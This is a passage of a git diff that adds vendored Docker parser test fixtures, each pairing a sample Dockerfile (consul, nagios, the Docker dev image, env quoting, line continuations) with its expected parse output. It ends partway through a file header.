--- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile @@ -0,0 +1,35 @@ +# ESCAPE=\ + + + +FROM brimstone/ubuntu:14.04 + + +# TORUN -v /var/run/docker.sock:/var/run/docker.sock + + +ENV GOPATH \ +/go + + + +# Install the packages we need, clean up after them and us +RUN apt-get update \ + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ + + + && apt-get install -y 
--no-install-recommends git golang ca-certificates \ + && apt-get clean \ + && rm -rf /var/lib/apt/lists \ + + && go get -v github.com/brimstone/consuldock \ + && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \ + + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ + && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ + && rm /tmp/dpkg.* \ + && rm -rf $GOPATH + + + + diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile new file mode 100644 index 0000000000..1d65578794 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile @@ -0,0 +1,3 @@ +FROM busybox + +ENV PATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile new file mode 100644 index 0000000000..d1be4596c7 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile @@ -0,0 +1 @@ +CMD [ "echo", [ "nested json" ] ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile new file mode 100644 index 0000000000..00b444cba5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile @@ -0,0 +1,11 @@ +FROM ubuntu:14.04 +MAINTAINER Seongyeol Lim + +COPY . /go/src/github.com/docker/docker +ADD . 
/ +ADD null / +COPY nullfile /tmp +ADD [ "vimrc", "/tmp" ] +COPY [ "bashrc", "/tmp" ] +COPY [ "test file", "/tmp" ] +ADD [ "test file", "/tmp/test file" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result new file mode 100644 index 0000000000..85aee64018 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result @@ -0,0 +1,10 @@ +(from "ubuntu:14.04") +(maintainer "Seongyeol Lim ") +(copy "." "/go/src/github.com/docker/docker") +(add "." "/") +(add "null" "/") +(copy "nullfile" "/tmp") +(add "vimrc" "/tmp") +(copy "bashrc" "/tmp") +(copy "test file" "/tmp") +(add "test file" "/tmp/test file") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile new file mode 100644 index 0000000000..0364ef9d96 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile @@ -0,0 +1,26 @@ +#escape=\ +FROM brimstone/ubuntu:14.04 + +MAINTAINER brimstone@the.narro.ws + +# TORUN -v /var/run/docker.sock:/var/run/docker.sock + +ENV GOPATH /go + +# Set our command +ENTRYPOINT ["/usr/local/bin/consuldock"] + +# Install the packages we need, clean up after them and us +RUN apt-get update \ + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ + && apt-get install -y --no-install-recommends git golang ca-certificates \ + && apt-get clean \ + && rm -rf /var/lib/apt/lists \ + + && go get -v github.com/brimstone/consuldock \ + && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \ + + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ + && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ + && rm /tmp/dpkg.* \ + && rm -rf 
$GOPATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result new file mode 100644 index 0000000000..227f748cda --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result @@ -0,0 +1,5 @@ +(from "brimstone/ubuntu:14.04") +(maintainer "brimstone@the.narro.ws") +(env "GOPATH" "/go") +(entrypoint "/usr/local/bin/consuldock") +(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends git golang ca-certificates && apt-get clean && rm -rf /var/lib/apt/lists \t&& go get -v github.com/brimstone/consuldock && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile new file mode 100644 index 0000000000..25ae352166 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile @@ -0,0 +1,52 @@ +FROM brimstone/ubuntu:14.04 + +CMD [] + +ENTRYPOINT ["/usr/bin/consul", "agent", "-server", "-data-dir=/consul", "-client=0.0.0.0", "-ui-dir=/webui"] + +EXPOSE 8500 8600 8400 8301 8302 + +RUN apt-get update \ + && apt-get install -y unzip wget \ + && apt-get clean \ + && rm -rf /var/lib/apt/lists + +RUN cd /tmp \ + && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \ + -O web_ui.zip \ + && unzip web_ui.zip \ + && mv dist /webui \ + && rm web_ui.zip + +RUN apt-get update \ + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ + && apt-get 
install -y --no-install-recommends unzip wget \ + && apt-get clean \ + && rm -rf /var/lib/apt/lists \ + + && cd /tmp \ + && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \ + -O web_ui.zip \ + && unzip web_ui.zip \ + && mv dist /webui \ + && rm web_ui.zip \ + + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ + && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ + && rm /tmp/dpkg.* + +ENV GOPATH /go + +RUN apt-get update \ + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ + && apt-get install -y --no-install-recommends git golang ca-certificates build-essential \ + && apt-get clean \ + && rm -rf /var/lib/apt/lists \ + + && go get -v github.com/hashicorp/consul \ + && mv $GOPATH/bin/consul /usr/bin/consul \ + + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ + && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ + && rm /tmp/dpkg.* \ + && rm -rf $GOPATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result new file mode 100644 index 0000000000..16492e516a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result @@ -0,0 +1,9 @@ +(from "brimstone/ubuntu:14.04") +(cmd) +(entrypoint "/usr/bin/consul" "agent" "-server" "-data-dir=/consul" "-client=0.0.0.0" "-ui-dir=/webui") +(expose "8500" "8600" "8400" "8301" "8302") +(run "apt-get update && apt-get install -y unzip wget \t&& apt-get clean \t&& rm -rf /var/lib/apt/lists") +(run "cd /tmp && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip -O web_ui.zip && unzip web_ui.zip && mv dist /webui && rm web_ui.zip") +(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends unzip wget && apt-get clean && rm -rf 
/var/lib/apt/lists && cd /tmp && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip -O web_ui.zip && unzip web_ui.zip && mv dist /webui && rm web_ui.zip \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.*") +(env "GOPATH" "/go") +(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends git golang ca-certificates build-essential && apt-get clean && rm -rf /var/lib/apt/lists \t&& go get -v github.com/hashicorp/consul \t&& mv $GOPATH/bin/consul /usr/bin/consul \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile new file mode 100644 index 0000000000..42b324e77b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile @@ -0,0 +1,36 @@ +FROM ubuntu:14.04 + +RUN echo hello\ + world\ + goodnight \ + moon\ + light\ +ning +RUN echo hello \ + world +RUN echo hello \ +world +RUN echo hello \ +goodbye\ +frog +RUN echo hello \ +world +RUN echo hi \ + \ + world \ +\ + good\ +\ +night +RUN echo goodbye\ +frog +RUN echo good\ +bye\ +frog + +RUN echo hello \ +# this is a comment + +# this is a comment with a blank line surrounding it + +this is some more useful stuff diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result new file mode 100644 index 0000000000..268ae073c8 --- /dev/null +++ 
b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result @@ -0,0 +1,10 @@ +(from "ubuntu:14.04") +(run "echo hello world goodnight moon lightning") +(run "echo hello world") +(run "echo hello world") +(run "echo hello goodbyefrog") +(run "echo hello world") +(run "echo hi world goodnight") +(run "echo goodbyefrog") +(run "echo goodbyefrog") +(run "echo hello this is some more useful stuff") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile new file mode 100644 index 0000000000..8ccb71a578 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile @@ -0,0 +1,54 @@ +FROM cpuguy83/ubuntu +ENV NAGIOS_HOME /opt/nagios +ENV NAGIOS_USER nagios +ENV NAGIOS_GROUP nagios +ENV NAGIOS_CMDUSER nagios +ENV NAGIOS_CMDGROUP nagios +ENV NAGIOSADMIN_USER nagiosadmin +ENV NAGIOSADMIN_PASS nagios +ENV APACHE_RUN_USER nagios +ENV APACHE_RUN_GROUP nagios +ENV NAGIOS_TIMEZONE UTC + +RUN sed -i 's/universe/universe multiverse/' /etc/apt/sources.list +RUN apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx +RUN ( egrep -i "^${NAGIOS_GROUP}" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i "^${NAGIOS_CMDGROUP}" /etc/group || groupadd $NAGIOS_CMDGROUP ) +RUN ( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER ) + +ADD http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3 /tmp/nagios.tar.gz +RUN cd /tmp && tar -zxvf nagios.tar.gz && cd nagios && 
./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker --with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf +ADD http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz /tmp/ +RUN cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install + +RUN sed -i.bak 's/.*\=www\-data//g' /etc/apache2/envvars +RUN export DOC_ROOT="DocumentRoot $(echo $NAGIOS_HOME/share)"; sed -i "s,DocumentRoot.*,$DOC_ROOT," /etc/apache2/sites-enabled/000-default + +RUN ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo + +RUN echo "use_timezone=$NAGIOS_TIMEZONE" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo "SetEnv TZ \"${NAGIOS_TIMEZONE}\"" >> /etc/apache2/conf.d/nagios.conf + +RUN mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs +RUN echo "cfg_dir=${NAGIOS_HOME}/etc/conf.d" >> ${NAGIOS_HOME}/etc/nagios.cfg +RUN echo "cfg_dir=${NAGIOS_HOME}/etc/monitor" >> ${NAGIOS_HOME}/etc/nagios.cfg +RUN download-mibs && echo "mibs +ALL" > /etc/snmp/snmp.conf + +RUN sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg && \ + sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg +RUN cp /etc/services /var/spool/postfix/etc/ + +RUN mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix +ADD nagios.init /etc/sv/nagios/run +ADD apache.init /etc/sv/apache/run +ADD postfix.init /etc/sv/postfix/run +ADD postfix.stop /etc/sv/postfix/finish + +ADD start.sh /usr/local/bin/start_nagios + +ENV 
APACHE_LOCK_DIR /var/run +ENV APACHE_LOG_DIR /var/log/apache2 + +EXPOSE 80 + +VOLUME ["/opt/nagios/var", "/opt/nagios/etc", "/opt/nagios/libexec", "/var/log/apache2", "/usr/share/snmp/mibs"] + +CMD ["/usr/local/bin/start_nagios"] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result new file mode 100644 index 0000000000..25dd3ddfe5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result @@ -0,0 +1,40 @@ +(from "cpuguy83/ubuntu") +(env "NAGIOS_HOME" "/opt/nagios") +(env "NAGIOS_USER" "nagios") +(env "NAGIOS_GROUP" "nagios") +(env "NAGIOS_CMDUSER" "nagios") +(env "NAGIOS_CMDGROUP" "nagios") +(env "NAGIOSADMIN_USER" "nagiosadmin") +(env "NAGIOSADMIN_PASS" "nagios") +(env "APACHE_RUN_USER" "nagios") +(env "APACHE_RUN_GROUP" "nagios") +(env "NAGIOS_TIMEZONE" "UTC") +(run "sed -i 's/universe/universe multiverse/' /etc/apt/sources.list") +(run "apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx") +(run "( egrep -i \"^${NAGIOS_GROUP}\" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i \"^${NAGIOS_CMDGROUP}\" /etc/group || groupadd $NAGIOS_CMDGROUP )") +(run "( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER )") +(add "http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3" "/tmp/nagios.tar.gz") +(run "cd /tmp && tar -zxvf nagios.tar.gz && cd nagios && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker 
--with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf") +(add "http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz" "/tmp/") +(run "cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install") +(run "sed -i.bak 's/.*\\=www\\-data//g' /etc/apache2/envvars") +(run "export DOC_ROOT=\"DocumentRoot $(echo $NAGIOS_HOME/share)\"; sed -i \"s,DocumentRoot.*,$DOC_ROOT,\" /etc/apache2/sites-enabled/000-default") +(run "ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo") +(run "echo \"use_timezone=$NAGIOS_TIMEZONE\" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo \"SetEnv TZ \\\"${NAGIOS_TIMEZONE}\\\"\" >> /etc/apache2/conf.d/nagios.conf") +(run "mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs") +(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/conf.d\" >> ${NAGIOS_HOME}/etc/nagios.cfg") +(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/monitor\" >> ${NAGIOS_HOME}/etc/nagios.cfg") +(run "download-mibs && echo \"mibs +ALL\" > /etc/snmp/snmp.conf") +(run "sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg && sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg") +(run "cp /etc/services /var/spool/postfix/etc/") +(run "mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix") +(add "nagios.init" "/etc/sv/nagios/run") +(add "apache.init" "/etc/sv/apache/run") +(add "postfix.init" "/etc/sv/postfix/run") +(add "postfix.stop" "/etc/sv/postfix/finish") +(add "start.sh" "/usr/local/bin/start_nagios") +(env 
"APACHE_LOCK_DIR" "/var/run") +(env "APACHE_LOG_DIR" "/var/log/apache2") +(expose "80") +(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs") +(cmd "/usr/local/bin/start_nagios") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile new file mode 100644 index 0000000000..99fbe55be0 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile @@ -0,0 +1,103 @@ +# This file describes the standard way to build Docker, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# # Publish a release: +# docker run --privileged \ +# -e AWS_S3_BUCKET=baz \ +# -e AWS_ACCESS_KEY=foo \ +# -e AWS_SECRET_KEY=bar \ +# -e GPG_PASSPHRASE=gloubiboulga \ +# docker hack/release.sh +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. 
+# + +FROM ubuntu:14.04 +MAINTAINER Tianon Gravi (@tianon) + +# Packaged dependencies +RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \ + apt-utils \ + aufs-tools \ + automake \ + btrfs-tools \ + build-essential \ + curl \ + dpkg-sig \ + git \ + iptables \ + libapparmor-dev \ + libcap-dev \ + libsqlite3-dev \ + mercurial \ + pandoc \ + parallel \ + reprepro \ + ruby1.9.1 \ + ruby1.9.1-dev \ + s3cmd=1.1.0* \ + --no-install-recommends + +# Get lvm2 source for compiling statically +RUN git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103 +# see https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags +# note: we don't use "git clone -b" above because it then spews big nasty warnings about 'detached HEAD' state that we can't silence as easily as we can silence them using "git checkout" directly + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper +# see https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +# Install Go +RUN curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz +ENV PATH /usr/local/go/bin:$PATH +ENV GOPATH /go:/go/src/github.com/docker/docker/vendor +RUN cd /usr/local/go/src && ./make.bash --no-clean 2>&1 + +# Compile Go for cross compilation +ENV DOCKER_CROSSPLATFORMS \ + linux/386 linux/arm \ + darwin/amd64 darwin/386 \ + freebsd/amd64 freebsd/386 freebsd/arm +# (set an explicit GOARM of 5 for maximum compatibility) +ENV GOARM 5 +RUN cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done' + +# Grab Go's cover tool for dead-simple code coverage testing +RUN go get golang.org/x/tools/cmd/cover + +# TODO replace FPM with some very minimal debhelper stuff +RUN gem install --no-rdoc --no-ri fpm --version 1.0.2 + +# Get the 
"busybox" image source so we can build locally instead of pulling +RUN git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox + +# Setup s3cmd config +RUN /bin/echo -e '[default]\naccess_key=$AWS_ACCESS_KEY\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor selinux + +# Wrap all commands in the "docker-in-docker" script to allow nested containers +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result new file mode 100644 index 0000000000..d032f9bac4 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result @@ -0,0 +1,24 @@ +(from "ubuntu:14.04") +(maintainer "Tianon Gravi (@tianon)") +(run "apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \tapt-utils \taufs-tools \tautomake \tbtrfs-tools \tbuild-essential \tcurl \tdpkg-sig \tgit \tiptables \tlibapparmor-dev \tlibcap-dev \tlibsqlite3-dev \tmercurial \tpandoc \tparallel \treprepro \truby1.9.1 \truby1.9.1-dev \ts3cmd=1.1.0* \t--no-install-recommends") +(run "git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103") +(run "cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper") +(run "curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz") +(env "PATH" "/usr/local/go/bin:$PATH") +(env 
"GOPATH" "/go:/go/src/github.com/docker/docker/vendor") +(run "cd /usr/local/go/src && ./make.bash --no-clean 2>&1") +(env "DOCKER_CROSSPLATFORMS" "linux/386 linux/arm \tdarwin/amd64 darwin/386 \tfreebsd/amd64 freebsd/386 freebsd/arm") +(env "GOARM" "5") +(run "cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done'") +(run "go get golang.org/x/tools/cmd/cover") +(run "gem install --no-rdoc --no-ri fpm --version 1.0.2") +(run "git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox") +(run "/bin/echo -e '[default]\\naccess_key=$AWS_ACCESS_KEY\\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg") +(run "git config --global user.email 'docker-dummy@example.com'") +(run "groupadd -r docker") +(run "useradd --create-home --gid docker unprivilegeduser") +(volume "/var/lib/docker") +(workdir "/go/src/github.com/docker/docker") +(env "DOCKER_BUILDTAGS" "apparmor selinux") +(entrypoint "hack/dind") +(copy "." 
"/go/src/github.com/docker/docker") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile new file mode 100644 index 0000000000..08fa18acec --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile @@ -0,0 +1,23 @@ +FROM ubuntu +ENV name value +ENV name=value +ENV name=value name2=value2 +ENV name="value value1" +ENV name=value\ value2 +ENV name="value'quote space'value2" +ENV name='value"double quote"value2' +ENV name=value\ value2 name2=value2\ value3 +ENV name="a\"b" +ENV name="a\'b" +ENV name='a\'b' +ENV name='a\'b'' +ENV name='a\"b' +ENV name="''" +# don't put anything after the next line - it must be the last line of the +# Dockerfile and it must end with \ +ENV name=value \ + name1=value1 \ + name2="value2a \ + value2b" \ + name3="value3a\n\"value3b\"" \ + name4="value4a\\nvalue4b" \ diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result new file mode 100644 index 0000000000..ba0a6dd7cb --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result @@ -0,0 +1,16 @@ +(from "ubuntu") +(env "name" "value") +(env "name" "value") +(env "name" "value" "name2" "value2") +(env "name" "\"value value1\"") +(env "name" "value\\ value2") +(env "name" "\"value'quote space'value2\"") +(env "name" "'value\"double quote\"value2'") +(env "name" "value\\ value2" "name2" "value2\\ value3") +(env "name" "\"a\\\"b\"") +(env "name" "\"a\\'b\"") +(env "name" "'a\\'b'") +(env "name" "'a\\'b''") +(env "name" "'a\\\"b'") +(env "name" "\"''\"") +(env "name" "value" "name1" "value1" "name2" "\"value2a value2b\"" "name3" "\"value3a\\n\\\"value3b\\\"\"" "name4" "\"value4a\\\\nvalue4b\"") diff --git 
a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile new file mode 100644 index 0000000000..6def7efdcd --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile @@ -0,0 +1,9 @@ +# Comment here. Should not be looking for the following parser directive. +# Hence the following line will be ignored, and the subsequent backslash +# continuation will be the default. +# escape = ` + +FROM image +MAINTAINER foo@bar.com +ENV GOPATH \ +\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result new file mode 100644 index 0000000000..21522a880b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result @@ -0,0 +1,3 @@ +(from "image") +(maintainer "foo@bar.com") +(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile new file mode 100644 index 0000000000..08a8cc4326 --- /dev/null +++ 